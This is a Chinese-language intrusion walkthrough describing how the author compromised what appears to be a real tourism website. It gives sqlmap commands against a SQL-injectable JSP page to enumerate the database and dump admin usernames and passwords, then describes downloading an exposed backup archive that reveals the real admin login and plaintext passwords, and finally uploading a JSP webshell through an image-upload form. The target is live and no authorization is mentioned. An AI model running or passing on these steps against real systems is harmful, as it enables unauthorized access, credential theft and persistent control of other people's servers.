sqlmap實例拿站

目標：

http://www.djj.com/yz/cn/videodt.jsp?Videoid=10
此URL爲sa權限豬肉一塊
用穿山甲不能執行命令

過程以下：
經過訪問
http://www.djj .com/login.jsp
得知該站由一論壇搭建
註冊普通用戶訪問
http://www.djj .com/admin/index.htm
得知該站由
http://www.easyjforum.cn/ejf_download.jsp
EasyJForum 論壇程序改編而來。

既然有了SA權限的注入點那就祭出神器sqlmap來跑下注入點
啓動BT5，打開sqlmap，輸入命令

python ./sqlmap.py -u http://www.yangzhoutour.com/yz/cn/videodt.jsp?Videoid=10

檢測結果如圖：

 

目標數據庫爲：Microsoft SQL Server2005
接着執行命令：

python ./sqlmap.py -u http://www.djj.com/yz/cn/videodt.jsp?Videoid=10 –current-db –current-user

執行結果如圖：

 

獲得當前用戶爲：sa
數據庫名：tour-2010-11-24

接下來咱們列下表執行：

python ./sqlmap.py -u http://www.djj.com/yz/cn/videodt.jsp?Videoid=10 –tables -D tour-2010-11-24

列出所有表如圖：

過下載EasyJForum 原程序找到論壇後臺用戶表以及相關用戶密碼字段
執行命令：

python ./sqlmap.py -u http://www.yangzhoutour.com/yz/cn/videodt.jsp?Videoid=10 –columns -T ejf_user users-D tour-2010-11-24 -v 0

在列出的用戶名和密碼列表中發現此用戶

 

破解後獲得
帳戶：administrator
密碼：administrator
用獲得的用戶信息嘗試登錄
http://www.djj.com/admin/index.htm
成功進入，在後臺瀏覽了一遍沒有找到拿shell方法。不過發現了一個這個功能

如今有兩個方法拿shell了：
1. 經過修改管理員聯繫郵箱爲本身郵箱地址而後經過數據備份功能將網站目錄備份發送到個人郵箱
2. 經過上圖猜想管理員應該執行過備份。能夠經過下載備份文件獲得數據庫配置等信息拿shell。
我直接訪問域名+1.rar，下載了該備份文件。

在該備份文件中查找到了網站真正後臺地址：
http://www.djj.com/yz/Manage/admin_login.jsp
以及用戶表及相關用戶名和密碼的字段
表名：GlUserInfo
用戶：username
密碼：password (MD5加密後40位)
真正密碼：passwd(未加密明文 )

執行命令：

python ./sqlmap.py -u http://www.djj.com/yz/cn/videodt.jsp?Videoid=10 –dump -C username,passwd,password -T gluserinfo -D tour-2010-11-24 -v 0

獲得用戶及密碼：


使用獲得的用戶名和密碼登錄後臺，找個上傳圖片的地方直接上傳了jspshell。